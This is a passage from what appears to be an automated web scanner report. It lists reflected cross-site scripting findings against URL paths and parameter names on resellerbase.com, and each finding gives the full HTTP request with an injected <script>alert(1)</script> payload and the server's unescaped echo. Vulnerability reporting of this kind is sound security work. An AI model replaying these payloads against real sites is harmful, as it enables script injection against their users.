Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/ratingd6c3e<script>alert(1)</script>6e698512bf1/3half.gif was not found on this server.</p>
...[SNIP]...

2.359. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e72fa<script>alert(1)</script>57f75f8bca3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/3half.gife72fa<script>alert(1)</script>57f75f8bca3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/3half.gife72fa<script>alert(1)</script>57f75f8bca3 was not found on this server.</p>
...[SNIP]...

2.360. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 35060<script>alert(1)</script>4f37a1fb8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/3half.gif?35060<script>alert(1)</script>4f37a1fb8a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/3half.gif?35060<script>alert(1)</script>4f37a1fb8a7=1 was not found on this server.</p>
...[SNIP]...

2.361. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd735<script>alert(1)</script>0c3c375d60e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultcd735<script>alert(1)</script>0c3c375d60e/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultcd735<script>alert(1)</script>0c3c375d60e/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.362. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be1f0<script>alert(1)</script>c464813e621 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesbe1f0<script>alert(1)</script>c464813e621/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesbe1f0<script>alert(1)</script>c464813e621/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.363. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b752<script>alert(1)</script>a88cc6be903 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos5b752<script>alert(1)</script>a88cc6be903/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos5b752<script>alert(1)</script>a88cc6be903/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.364. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f71d<script>alert(1)</script>16cd9e08485 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images1f71d<script>alert(1)</script>16cd9e08485/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images1f71d<script>alert(1)</script>16cd9e08485/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.365. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9443<script>alert(1)</script>9f3832d302c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/ratingd9443<script>alert(1)</script>9f3832d302c/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/ratingd9443<script>alert(1)</script>9f3832d302c/4.gif was not found on this server.</p>
...[SNIP]...

2.366. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fd062<script>alert(1)</script>7771027ff46 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/4.giffd062<script>alert(1)</script>7771027ff46 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/4.giffd062<script>alert(1)</script>7771027ff46 was not found on this server.</p>
...[SNIP]...

2.367. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af551<script>alert(1)</script>dcce3eedae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/4.gif?af551<script>alert(1)</script>dcce3eedae=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/4.gif?af551<script>alert(1)</script>dcce3eedae=1 was not found on this server.</p>
...[SNIP]...

2.368. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1342a<script>alert(1)</script>ce94791fce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult1342a<script>alert(1)</script>ce94791fce/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult1342a<script>alert(1)</script>ce94791fce/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.369. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17d0d<script>alert(1)</script>b92fce46caa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes17d0d<script>alert(1)</script>b92fce46caa/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes17d0d<script>alert(1)</script>b92fce46caa/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.370. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8e78d<script>alert(1)</script>9bfecd83daf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos8e78d<script>alert(1)</script>9bfecd83daf/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos8e78d<script>alert(1)</script>9bfecd83daf/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.371. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37176<script>alert(1)</script>5d8f33aa638 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images37176<script>alert(1)</script>5d8f33aa638/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images37176<script>alert(1)</script>5d8f33aa638/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.372. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fa61c<script>alert(1)</script>e58ac79bcf5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/ratingfa61c<script>alert(1)</script>e58ac79bcf5/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/ratingfa61c<script>alert(1)</script>e58ac79bcf5/4half.gif was not found on this server.</p>
...[SNIP]...

2.373. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload dfff2<script>alert(1)</script>8a0ee3a997c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/4half.gifdfff2<script>alert(1)</script>8a0ee3a997c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/4half.gifdfff2<script>alert(1)</script>8a0ee3a997c was not found on this server.</p>
...[SNIP]...

2.374. http://www.resellerbase.com/adult/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ab350<script>alert(1)</script>f5700d6f99e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/4half.gif?ab350<script>alert(1)</script>f5700d6f99e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/4half.gif?ab350<script>alert(1)</script>f5700d6f99e=1 was not found on this server.</p>
...[SNIP]...

2.375. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f67f<script>alert(1)</script>fda7dc51277 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult1f67f<script>alert(1)</script>fda7dc51277/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult1f67f<script>alert(1)</script>fda7dc51277/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.376. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f1ea<script>alert(1)</script>37dd6b01ec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes7f1ea<script>alert(1)</script>37dd6b01ec7/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes7f1ea<script>alert(1)</script>37dd6b01ec7/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.377. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d5f6<script>alert(1)</script>df3745797cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos7d5f6<script>alert(1)</script>df3745797cf/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
